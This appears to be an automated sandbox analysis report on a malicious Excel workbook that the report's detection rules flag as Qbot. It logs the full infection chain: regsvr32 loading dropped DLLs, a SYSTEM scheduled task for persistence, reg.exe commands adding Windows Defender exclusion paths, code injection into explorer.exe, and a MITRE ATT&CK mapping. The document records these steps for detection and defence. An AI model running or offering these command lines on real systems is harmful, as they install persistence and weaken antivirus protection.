                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Otovcuqo' /d '0'
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.redJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.redJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.redJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.redJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0'Jump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Otovcuqo' /d '0'Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'Jump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE2FE.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/6@0/3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,6_2_1000D523
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,13_2_100030B7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,13_2_100030B7
                        Source: Compensation-1214892625-09272021.xlsOLE indicator, Workbook stream: true
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,6_2_1000ABA3
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{934600C4-65F4-44D0-AC1B-D6E4F146000D}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{68B24FFE-D380-4271-AF48-867FC64F6CB5}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{93993779-4C3C-4498-ABBF-6FA1BBE86A8C}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{93993779-4C3C-4498-ABBF-6FA1BBE86A8C}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{934600C4-65F4-44D0-AC1B-D6E4F146000D}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{68B24FFE-D380-4271-AF48-867FC64F6CB5}
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.611132959.00000000026A1000.00000004.00000001.sdmp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001A00E push ebx; ret 6_2_1001A00F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001D485 push FFFFFF8Ah; iretd 6_2_1001D50E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001D4B6 push FFFFFF8Ah; iretd 6_2_1001D50E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10019D5C push cs; iretd 6_2_10019E32
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10019E5E push cs; iretd 6_2_10019E32
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001BB29 push esi; iretd 6_2_1001BB2E
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009A00E push ebx; ret 7_2_0009A00F
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009D485 push FFFFFF8Ah; iretd 7_2_0009D50E
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009D4B6 push FFFFFF8Ah; iretd 7_2_0009D50E
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00099D5C push cs; iretd 7_2_00099E32
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00099E5E push cs; iretd 7_2_00099E32
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009BB29 push esi; iretd 7_2_0009BB2E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00782C41 push 00000000h; mov dword ptr [esp], esi13_2_00782D71
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00782C41 push 00000000h; mov dword ptr [esp], esi13_2_00782E73
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00782C41 push 00000000h; mov dword ptr [esp], esi13_2_0078336F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00782C41 push 00000000h; mov dword ptr [esp], ebp13_2_007833F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00782C41 push edi; mov dword ptr [esp], 00000004h13_2_0078340B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00782C41 push 00000000h; mov dword ptr [esp], edx13_2_0078346C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078242A push 00000000h; mov dword ptr [esp], esi13_2_0078276D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078242A push 00000000h; mov dword ptr [esp], edi13_2_0078288F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078242A push 00000000h; mov dword ptr [esp], ebx13_2_007828C3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078242A push 00000000h; mov dword ptr [esp], edi13_2_00782B65
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00781424 push 00000000h; mov dword ptr [esp], ecx13_2_00781460
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00781424 push 00000000h; mov dword ptr [esp], ecx13_2_0078159D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00783726 push 00000000h; mov dword ptr [esp], ebp13_2_0078376E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00783726 push 00000000h; mov dword ptr [esp], edx13_2_00783A0E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00783726 push 00000000h; mov dword ptr [esp], esi13_2_00783B55
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00783726 push esi; mov dword ptr [esp], 00000001h13_2_00783D71
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00783726 push 00000000h; mov dword ptr [esp], ecx13_2_00783D9C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00783726 push 00000000h; mov dword ptr [esp], ebp13_2_00783E46
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00783726 push 00000000h; mov dword ptr [esp], esi13_2_00783E72
                        Source: 44467.5523376157[1].dat.0.drStatic PE information: section name: .rdatat
                        Source: 44467.5523376157[1].dat.0.drStatic PE information: section name:
                        Source: 44467.5523376157[1].dat.0.drStatic PE information: section name:
                        Source: 44467.5523376157[1].dat.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,6_2_1000DFAD

                        Persistence and Installation Behavior:

                        barindex
                        Uses cmd line tools excessively to alter registry or file dataShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exeJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].datJump to dropped file
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file

                        Boot Survival:

                        barindex
                        Drops PE files to the user root directoryShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,13_2_100030B7

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2980 base: 1E102D value: E9 BA 4C EA FF Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2072 base: 1E102D value: E9 BA 4C EA FF Jump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1724Thread sleep count: 42 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2836Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 292Thread sleep count: 46 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1916Thread sleep count: 54 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1916Thread sleep time: -92000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                        Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-13224
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].datJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-10265
                        Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,6_2_1000D01F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,6_2_1000AEB4
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,7_2_0008AEB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,13_2_1000AEB4
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,14_2_0008AEB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,6_2_10005F82
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,6_2_1000DFAD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00784495 or ebx, dword ptr fs:[00000030h]13_2_00784495
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00085A61 RtlAddVectoredExceptionHandler,7_2_00085A61
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00085A61 RtlAddVectoredExceptionHandler,14_2_00085A61

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        Maps a DLL or memory area into another processShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
                        Writes to foreign memory regionsShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 1E102DJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 1E102DJump to behavior
                        Allocates memory in foreign processesShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and writeJump to behavior
                        Injects code into the Windows Explorer (explorer.exe)Show sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2980 base: B0000 value: 9CJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2980 base: 1E102D value: E9Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2072 base: B0000 value: 9CJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2072 base: 1E102D value: E9Jump to behavior
                        Yara detected hidden Macro 4.0 in ExcelShow sources
                        Source: Yara matchFile source: Compensation-1214892625-09272021.xls, type: SAMPLE
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.redJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0'Jump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Otovcuqo' /d '0'Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'Jump to behavior
                        Source: explorer.exe, 00000007.00000002.875487532.0000000000CF0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000007.00000002.875487532.0000000000CF0000.00000002.00020000.sdmpBinary or memory string: !Progman
                        Source: explorer.exe, 00000007.00000002.875487532.0000000000CF0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000831C2 CreateNamedPipeA,7_2_000831C2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,6_2_1000980C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,6_2_1000D01F

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected QbotShow sources
                        Source: Yara matchFile source: 6.2.regsvr32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.420000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.420000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.609100712.0000000000200000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.622702900.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, type: MEMORY

                        Remote Access Functionality:

                        barindex
                        Yara detected QbotShow sources
                        Source: Yara matchFile source: 6.2.regsvr32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.420000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.420000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.609100712.0000000000200000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.622702900.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsCommand and Scripting Interpreter11Windows Service3Windows Service3Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection413Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsScripting2Logon Script (Windows)Scheduled Task/Job1Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsService Execution2Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsNative API3Network Logon ScriptNetwork Logon ScriptProcess Injection413LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
